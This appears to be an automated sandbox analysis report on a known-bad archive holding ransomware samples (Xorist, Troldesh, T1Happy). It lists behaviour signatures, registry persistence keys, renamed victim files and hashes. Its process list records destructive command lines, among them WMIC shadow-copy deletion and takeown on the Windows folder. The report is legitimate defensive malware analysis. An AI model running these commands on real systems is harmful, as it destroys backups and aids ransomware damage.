Analysis Overview
SHA256
5015af8fb5725c4c9ebac28a890128587b888acddab6cc9ff06e94e782713882
Threat Level: Known bad
The file Batch_10.zip was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
T1happy family
Modifies WinLogon for persistence
Troldesh, Shade, Encoder.858
T1Happy
Xorist family
Detected Xorist Ransomware
Troldesh family
Modifies boot configuration data using bcdedit
Deletes shadow copies
Renames multiple (2207) files with added filename extension
Renames multiple (5449) files with added filename extension
Renames multiple (5457) files with added filename extension
Renames multiple (1213) files with added filename extension
Drops file in Drivers directory
Download via BitsAdmin
Suspicious Office macro
Disables RegEdit via registry modification
Drops startup file
Unsecured Credentials: Credentials In Files
Reads user/profile data of web browsers
Modifies file permissions
Reads data files stored by FTP clients
Impair Defenses: Safe Mode Boot
Loads dropped DLL
Credentials from Password Stores: Windows Credential Manager
Executes dropped EXE
Drops desktop.ini file(s)
Adds Run key to start application
Checks installed software on the system
Looks up external IP address via web service
Network Share Discovery
Sets desktop wallpaper using registry
Suspicious use of SetThreadContext
Drops file in System32 directory
Hide Artifacts: Hidden Files and Directories
UPX packed file
Drops file in Program Files directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
System Network Configuration Discovery: Internet Connection Discovery
Program crash
Browser Information Discovery
Office loads VBA resources, possible macro or embedded object present
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Modifies registry class
Uses Volume Shadow Copy service COM API
Suspicious use of FindShellTrayWindow
Modifies registry key
Suspicious use of SendNotifyMessage
System policy modification
Interacts with shadow copies
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
NTFS ADS
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: RenamesItself
Runs ping.exe
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-22 03:39
Signatures
Detected Xorist Ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xorist family
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
299s
Max time network
122s
Command Line
Signatures
T1Happy
T1happy family
Deletes shadow copies
Renames multiple (5449) files with added filename extension
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
Credentials from Password Stores: Windows Credential Manager
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Cortana = "C:\\Users\\Admin\\AppData\\Local\\Temp\\T1_b7afca788487347804156f052c613db5.exe" | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cortana = "C:\\Users\\Admin\\AppData\\Local\\Temp\\T1_b7afca788487347804156f052c613db5.exe" | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099183.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216570.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00011_.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WING2.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\SIST02.XSL | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\es\System.Data.Services.resources.dll | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD.DEV.HXS | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR14F.GIF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\ACEERR.DLL | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153299.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200383.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18237_.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10268_.GIF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_F_COL.HXK | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21348_.GIF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Fancy.dotx | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Templates\1033\OriginMergeLetter.Dotx | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\logo.png | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsHomePage.html | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new.png | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\NETWORK\PREVIEW.GIF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107090.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216600.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0297749.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\CALENDAR.GIF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLLIBR.DLL.IDX_DLL | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\form_edit.js | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.MY.XML | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Windows Media Player\WMPDMC.exe | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_top.png | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_flyout.png | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185842.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00199_.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Places\BUZZ.WAV | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.JP.XML | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BANNER.DPV | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Internet Explorer\SIGNUP\install.ins | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0150861.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153514.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00389_.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\3082\MSO.ACL | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\it\PresentationBuildTasks.resources.dll | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\GIFIMP32.FLT | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Help\NamedURLs.HxK | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CASCADE\CASCADE.ELM | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00411_.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\VelvetRose.css | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LINE.JPG | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\SWBELL.NET.XML | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\de\PresentationBuildTasks.resources.dll | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_08.MID | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0186348.WMF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\XLCALL32.DLL | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR14F.GIF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR51B.GIF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue.css | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\de\UIAutomationClient.resources.dll | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10265_.GIF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21310_.GIF | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_Casual.gif | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME08.CSS | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_FormsHomePage.gif | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" | C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe
"C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe"
C:\Windows\SysWOW64\wbem\WMIC.exe
"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\"."
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\"."
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | finndev.net | udp |
Files
memory/3056-0-0x000000007472E000-0x000000007472F000-memory.dmp
memory/3056-1-0x0000000001040000-0x000000000104E000-memory.dmp
memory/3056-2-0x0000000074720000-0x0000000074E0E000-memory.dmp
memory/3056-14-0x000000007472E000-0x000000007472F000-memory.dmp
memory/3056-86-0x0000000074720000-0x0000000074E0E000-memory.dmp
C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EDGE\EDGE.INF.happy
| MD5 | dbc5243b65101d62b94f3c71abd492a9 |
| SHA1 | 65d06ffd0ee3b4318173fa2832051010b75ce12c |
| SHA256 | e38ccf5cb2b2127518378113f2743bacb174ff328efc75f6719f1537c18c8405 |
| SHA512 | 23a2af9939480ffc3040dff5a79ef224f99b1122b1c8554b55c1d454b12dd0461af69695de45e4029b8b706b8ebea276ca693e5099475e565a6fb65cf0f067da |
C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14752_.GIF.happy
| MD5 | bac21b523853b4e0d4cb8d25bab07813 |
| SHA1 | ec0acc988133f2297877447918ebe268eb84962c |
| SHA256 | 3c82891fe84d85311f6d91a3e64d83c5f06e5046ab9fa5d1faed7ed102c8e40f |
| SHA512 | abfd56474cda5699ee9322d6edf014292b71d7d3d6da0a585f1821453313eb3f29fe15c37f1584800d3c866ab568fa90c5fb2dd585ea840025c88817e3196662 |
C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15057_.GIF.happy
| MD5 | 84c245b9e2bcaa040651c930a68848ba |
| SHA1 | 8a127f877fee17d7f88e9d584db2d8339548bdc8 |
| SHA256 | aa4d7d217931d8a6fd9d822c941d559c26820cd5ea247a3754553cdd1a1a43a2 |
| SHA512 | 62ef5cf49ba6a7eabc32bfaf8d018f8bda8fa126cdb75616007d8cfb3caa827f67f41390524e2d3d1c44cdde0d061d4743b72a7d99e6bf8f6666418ae1770830 |
C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21377_.GIF.happy
| MD5 | 762ecbe25b0a0c090f25d54135a2bba9 |
| SHA1 | 5b8bb7260ee48c3a882c782dbaa6c77c934594d1 |
| SHA256 | d9211ee8f1cdadd8fe3a4bd4c588ae33f3a5fe41cab8f012c1306a01647394a3 |
